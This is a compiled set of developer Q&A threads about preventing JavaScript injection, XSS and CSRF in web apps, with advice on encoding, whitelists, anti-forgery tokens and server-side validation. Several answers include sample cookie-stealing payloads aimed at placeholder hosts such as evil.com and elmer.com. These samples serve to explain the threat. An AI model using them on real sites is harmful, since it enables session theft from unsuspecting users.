I been reading on asp.net mvc learning site about JavaScript injection and man it is an eye opener.
I never even realized/thought about someone using JavaScript to do some weird ass injection attacks.
It however left me with some unanswered questions.
First
When do you use html.encode? Like do you use it only when you are going to display information that that user or some other user had submitted?
Or do I use it for everything. Like say I have form that a user submits, this information will never be displayed to any of the users, should I be still using html.encode?
How would I do it like I am not sure how to put inside say and Html.TextBox() the html.encode tag.
Second
What happens say I have on my site a rich html editor. The user is allowed to use it and make things bold and whatever. Now I want to display information back to the user through a label. I can't Html.Encode it since then all the bold and stuff will not be rendered.
Yet I can't leave it like it is since what would stop a user to add some Javascript attack?
So what would I do? Use Regex to filter out all tags?
Third
There is also another tag you can use called "AntiforgeryToken" when would you use this one?
Thanks
Edit
Almost everyone says use a "White List" and "Black List" how would I write this list and compare it to incoming values(examples in C# would be nice)?
Good question!
For the first answer, I would consider looking here at a previous asked question. As the answer discusses, using HTML Encode will not protect you completely against all XSS attacks. To help with this, you should consider using the Microsoft Web Protection Library (AntiXSS in particular), available from Microsoft.
As has already been mentioned, using a list of allowed tags is the best thing to do, leaving others to be stripped out.
The AntiforgeryToken token works to prevent request forgery (CSRF) because it gives the user a cookie which is validated against the rendered form field when the page is posted. There's no reason that I am aware of that means that you can't use this in all of your forms.
Use HTML Encode for any data being displayed that has been submitted by a user. You don't need to use it when submitting into the database otherwise you would get odd data like: Simon '&' Sons. Really I don't see the harm to use it on any content written to the page dynamically.
Use a list of allowed tags and discard everything else for your HTML editor. As people said, use a whitelist.
The third one is meant to prevent a Cross-site request forgery attack. You use this to stop people being able to do a POST using a 'stolen' cookie from the user. So you may require a authenticated cookie before accepting a post but a malicious user could take that cookie when a user visits their site and then submit a form to your site claiming to be them.
See here for more:
http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx
How to use it:
http://blog.codeville.net/2008/09/01/prevent-cross-site-request-forgery-csrf-using-aspnet-mvcs-antiforgerytoken-helper/
Always validate the input received against a whitelist. If you use a blacklist you could and probably will come up against encoding issues. Always use a whitelist when validating input.
Do not rely on client side validation to validate the user input. Client side validation is great for helping the user input correct data. But a malicious user will not use this and could bypass the client side validation. Client side validate is should never be considered as a security fix. Using javascript to validate input should not be used. As you can see javascript is very easy to change and modify on any html page. Also javascript can be disabled in browser. So give additional check in your code behind file.
Additionally validate the input every time, not just when the data is initially accepted. For example if you set a cookie, make sure that cookie is the same value and it is correct on each and every request. A malicious user could modify and change the value anytime during the session.
There are various levels of security that can be implemented based on the design considerations of your application.
I would go with the following basic rules:
Sanitize all input, removing known malicious sections (for instance, <script> tags in a rich HTML editor). Regex based pattern matching is commonly used for this kind of sanitization.
Remove all input that are not in your white-list of allowed values.
Encode any HTML before storing in the database and Decode it back when it is being retrieved for display.
Edit:#Phoenix talks about validation in this context so I thought I'd add this. I have said this before and I reiterate: I am not against script based validation. I only caution people not to rely on it expressly. A common design pattern is to validate basic criteria using script based validation and apply rigorous validation on the server side when that data is submitted.
Related
if you are going to validate cakephp form using ajax, so not to reload the page, do you have to define validation array in the model? thank you.
You will always want to validate everything because you should never trust any input. This is a golden rule no matter what kind of program you write. Website or sensor. I would not even trust the input from a sensor for example and validate the data coming from it. Besides the server side validation you also should use the Security Component of CakePHP to secure your forms and site against attacks. You might want to use google to lookup a few attacks that the Security Component prevents, check the manual for a list.
Javascript runs only in your browser. You could simply disable javascript and enter whatever you want. Further you can edit the markup and add an additional input there and submit that changed form. Now make your guess what happens when you add a hidden field "role" and give the value "admin" for example...
I have a web page which needs to do the following:
dynamically create an HTML fragment using JavaScript
open a new window
display the HTML in the new window
My first approach used document.write to copy the HTML into the window. This works in most cases, but it causes problems with Internet Explorer when the original window has set document.domain. Plus document.write tends to be discouraged these days.
So my second approach was to put the HTML into a hidden form, set the form's target to the new window, and POST the form. This means I need a script on the server to respond to the form, by echoing the POSTed content.
But this is dangerous, since someone could make a request that includes <script> tags in the content. How can I avoid the potential XSS risk? I guess I could filter out things like <script>, although that seems clumsy. If I were creating the HTML on the server, I could encrypt it, or add some token that can only be verified on the server. But I'm creating it on the client.
EDIT: Thanks for the filtering suggestions so far. I may choose to go this route, but I'm wondering: what if I don't want any restrictions on the HTML I create? Is there any way I can validate that the document was created by my page?
Try HTML Purifier.
Edit:
"Is there any way I can validate that the document was created by my page?"
Not unless you create another copy of the html server-side and compare. Anything in your script can be viewed by the user, although you can make it difficult for non-technical users. Anything that client-side Javascript can do, a malicious user can do on a Javascript console.
Even if you somehow verified that the request came from your script, a malicious user can modify your script using a Javascript console by inserting lines of code that produce a dangerous request. All GET and POST data must be treated as malicious.
Try PHPIDS.
PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user’s session.
on a site the user can enter an email account to gain access. do not want this to be hacked by script kitties.
the input items are generated by javascript and posted via ajax. do I need things like fuzzy word matches in this environment?
Any time you give some user the possibility to input something, every time your application expects some data from the users, those data can be forged.
No matter how your form is built : your webserver espects some data ; those form and data can be forged/faked ; so, you must be prepared for anything that could be sent to your application.
Still, you can add some levels of security, using, for example :
HTTPS so communications cannot be listened to
A nonce in your form, to make things harder when it comes to forging forms
I assume you mean adequate security against someone writing a script to fish for for valid e-mails using a brute-force style attack? If so then no, your presumption that "script kiddies" are incapable of either scripting a full-fledged browser instance that can execute your JavaScript content or determining what URL your AJAX ultimately submits to and then forging requests is false.
If you want to protect against these kinds of attacks, then the only effective way to do so is to add code on the server side. For instance, you could track the number of incorrect access attempts posted per IP address, and block requests (for like an hour or so) from any IP that posts more than, say, 10 invalid requests in a 5-minute time span. Then you are reasonably safe against this kind of attack until you come across someone with a million-IP bot-net and a grudge against your site.
Another form of protection is to send some random code from the server to the client that gets submitted back with the form (for instance, as a hidden field), and code the server so that ignores any form submits that do not include this code. This solution works best if you have some way of verifying that the user is trustworthy before you display the form (so it's not really useful in the context of a login form, but it could help secure any post-login forms that you may have). Otherwise it is not too hard for an attacker to compose a script that just grabs a code from your server, and includes it in a forged request.
JavaScript + Ajax forms are just a more fancy means of forms. It's still a request with post/get data so same security measures should be undertaken as per normal HTML form.
Wether you use Ajax or basic HTTP requests, don't send back data you don't want users to see either way. Don't offer services or functionality by means of JavaScript/Ajax you wouldn't offer by means of basic HTTP requests.
Script injection does not need an JavaScript/Ajax vulnerabilities, it just needs unsecure backend code that doesn't catch and eliminate code injections.
I just happen to read the joel's blog here...
So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.
Since javascript runs on client end. All it can access or do is only on the client end.
It can read informations stored in hidden fields and change them.
It can read, write or manipulate cookies...
But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox. So we are not empowering him with new information or providing him undue access to our server...
Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole.
Edit : Thanks to all for enlightening . As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
Cross Site Scripting is a really big issue with javascript injection
It can read, write or manipulate cookies
That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie, and send it to some evil domain using AJAX (with JSONP to overcome the cross domain issues, I think you don't even need to bother with ajax, a simple <img src="http://evil.com/?cookieValue=123"> would suffice) and email yourself the authentication cookie of the poor guy.
I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to Script Injection attacks, two of the most well known of which are Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.
There are answers that explain CSRF and XSS. I'm the one to say that for the particular quoted passage, there is no security threat at all.
That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with instead of having to fake it using a text box that some Web site gives me and I have to abuse it.
I really think Joel wasn't really sober when writing that. The example was just plain misleading.
Edit some more elaborations:
We should keep several things in mind:
Code cannot do any harm unless executed.
JavaScript can only be executed on client side (Yes there are server-side JavaScript, but apparently not in the context of this question/article)
If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.
Of course there are CSRF, which other people have already explained. The only case where there is a threat is where User A can write some code which gets executed in User B's machine.
Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.
So here's a more complete, two part answer:
If we're talking about the quoted passage, the answer is "no harm"
I do not interpret the passage's meaning to mean something like the scenario described above, since it's very obviously talking about a basic "Hello, Elmer world" example. To synthetically induce implicit meanings out of the passage just makes it more misleading.
If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF
Bonus Here are a couple of more real-life scenarios of how an CSRF (User A writes JavaScript that gets exected on User B's machine) can take place
A Web page takes parameters from GET. An attacker can lure a victim to visit http://foo.com/?send_password_to=malicious.attacker.com
A Web page displays one user's generated content verbatim to other users. An attacker could put something likm this in his Avatar's URL: <script>send_your_secret_cookies_to('http://evil.com')</script> (this needs some tweaking to get pass quoting and etc., but you get the idea)
Cause your browser to sent requests to other services using your authentication details and then send the results back to the attacker.
Show a big picture of a penis instead of your company logo.
Send any personal info or login cookies to a server without your consent.
I would look the wikipedia article on javascript security. It covers a number of vulnerabilities.
If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:
Imagine that instead of "Hello, Elmer!", that user entered
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site after that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.
If you're saving that information to a database and displaying it, all users who visit that site will be served that content. If it's just content that's coming from a form that isn't actually saved anywhere (submitting a form and you're getting the data from a GET or POST request) then the user could maliciously craft a URL (oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript) to your site that contained JavaScript and trick another user into visiting that link.
For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a <script> tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.
Little example shown to me a while ago during XSS class..
Suppose Elmer is amateur hacker. Instead of writing his name in the box, he types this:
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
Now if the server keeps a log of the values written by users and some admin is logging in and viewing those values..... Elmer will get the cookie of that administrator!
Let's say a user would read your sourcecode and make his own tweak of for instance an ajax-call posting unwanted data to your server. Some developers are good at protecting direct userinput, but might not be as careful protecting database calls made from a ajax-call where the dev thinks he has control of all the data that is being sent trough the call.
What's the best way to prevent javascript injections in a VB.NET Web Application? Is there some way of disabling javascript on the pageload event?
Recently, part of the security plan for our vb.net product was to simply disable buttons on the page that weren't available to the specific user. However, I informed the guy who thought of the idea that typing
javascript:alert(document.getElementById("Button1").disabled="")
in the address bar would re-enable the button. I'm sure that someone else has ran into issues like this before, so any help is appreciated. Thanks!
Update:
Aside from validating user input, how can I protect the website from being toyed with from the address bar?
Any changes you make to the client-side behavior of your application are superficial and not secure at all. You should not rely upon these. They are nice to stop 99% of users, but it is trivially easy to bypass them. You should be checking whether a user has the right privileges for the action on the server side when the action is called, so that if someone did decide to re-enable the button themselves they would not be able to do whatever the button is meant to do. You have no control over what someone can do to the page with javascript, so you should never trust anything coming from the client.
Response to update: You can't in any practical way, which is exactly what the problem is. Once the website is in their browser, it's a free-for-all and they can have a go at it. Which is why your program should validate everything server side, every time.
The most important item to consider is html encoding the user input. If the user enters <script> it'll get converted to <script> etc.
Update: If expecting input from the url / querystring, validate the data with extreme measures. If possible white list the data received. When white listed, you're ensuring only what you deem correct and safe is a viable submission.
Never trust the users' input.
Always validate user input.
Never trust data from the clients. Always validate data and permissions on the server side, where you are in control. Remember that the user (or any other application) can send to you whatever data they want to.
It doesn't matter what you do to lock down the interface via javascript, your data can always be manipulated somehow. There are various tools, such as fiddler which can be used to modify, or recreate postbacks/requests.
Even if you find a way to lock things down, you're in an arms race if your data is important enough to the attacker. The most viable option is to validate your input server side.